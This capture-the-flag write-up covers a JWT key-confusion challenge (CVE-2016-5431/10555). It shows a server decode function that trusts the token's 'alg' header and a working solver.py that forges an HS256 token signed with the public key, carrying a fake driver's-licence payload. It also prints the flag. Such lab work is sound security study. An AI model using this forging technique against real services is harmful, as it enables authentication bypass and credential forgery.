misc/your papers please

Date, Time: Monday, 31-05-2024

Summary

The Python server requests a JWT code from the user. Upon analyzing the code, I discovered that the JWT decoding process is vulnerable to CVE-2016-5431/CVE-2016-10555 (Key Confusion attack). Therefore, I can create a Python script to generate a JWT token using the HS256 algorithm with the Public Key as the Secret Key and modify the expiration date. This way, the server will decode the token the user has inputted with the HS256 algorithm and the Public Key as the key. The server will successfully decode the malicious JWT, and the flag will be printed out.

Solving

Given a dist.zip

The source code is written in Python to run a Python server. Basically, the server will ask for a JWT token and validate it on the server. If the token is successfully validated, it will also check for the expiry date. The flag will be printed if the user has a valid and active JWT token.

The challenge also provided an mdl.txt file that contains a JWT token. I tried to decode the given JWT with an online JWT decoder. From the header, I learned that the JWT Signature is created using the ES256 algorithm. In the payload section, I can see that the expiry date of the token is set to the year 2022, which is about two years ago. I think the challenge's intention is straightforward: I need to craft a JWT token with a modified expiry date to get the flag.

After doing some research, I found an article that explains CVE-2016-5431/CVE-2016-10555 (Key Confusion attack). The given JWT is signed using the ES256 algorithm, but the problem lies in the server.py file where the server decodes the JWT insecurely. The algorithm used for decoding is taken from the JWT itself. So, if a user crafts a malicious token with HS256 as its algorithm, the server will try to decode the token with the HS256 algorithm instead of ES256 algorithm. The CVE states that if I change the algorithm from RS256 (asymmetric) to HS256 (symmetric), it will use the public key as the key.

def decode(token):
    signing_input, crypto_segment = token.rsplit(".", 1)
    header_segment, payload_segment = signing_input.split(".", 1)
    header_data = base64.urlsafe_b64decode(header_segment)
    header = json.loads(header_data)
    alg = header["alg"]
    return jwt.decode(token, algorithms=[alg], key=PUBLIC_KEY)

Now, i just need to create a JWT token with HS256 algorithm and encode the modified payload. The public key it self is hardcoded inside the server.py. After that just submit the malicious JWT to the server and the flag will be printed out.

solver.py

import jwt

PUBLIC_KEY = u'''-----BEGIN PUBLIC KEY-----
MIGbMBAGByqGSM49AgEGBSuBBAAjA4GGAAQBGOtycGkAMpTEDsjFykEywLecIdCX
1QIShxmJB0qJj9K2yFNwJj/eRR6yzIZcHJPZWzQU6Mad62y1MsJ8uOgdZ2sBmkS0
HJtT4FZq/EQbtkHeahsDnSLbFpPfoN/t8hmKrVmDzDRGe3PNl7OQVuzoY2TVSxVK
IKmpZ9Pw9/5HOzSmOxs=-----END PUBLIC KEY-----
'''

payload = {
  "version": "1.0",
  "docType": "iso.org.18013.5.1.mDL",
  "family_name": "TURNER",
  "given_name": "SUSAN",
  "birth_date": "1998-08-28",
  "issue_date": "2018-01-15T10:00:00.00",
  "expiry_date": "2024-08-27T12:00:00.00",
  "issuing_country": "US",
  "issuing_authority": "CO",
  "document_number": "542426814",
  "driving_privileges": [
    {
      "codes": [
        {
          "code": "D"
        }
      ],
      "vehicle_category_code": "D",
      "issue_date": "2019-01-01",
      "expiry_date": "2027-01-01"
    }
  ],
  "un_distinguishing_sign": "USA"
}

jwt = jwt.encode(payload=payload, key=PUBLIC_KEY, algorithm="HS256")
print(jwt)

Flag

TBTL{1n_H34d3rS_W3_Tru$7}

Previousweb/rnd-data-science

Last updated 1 year ago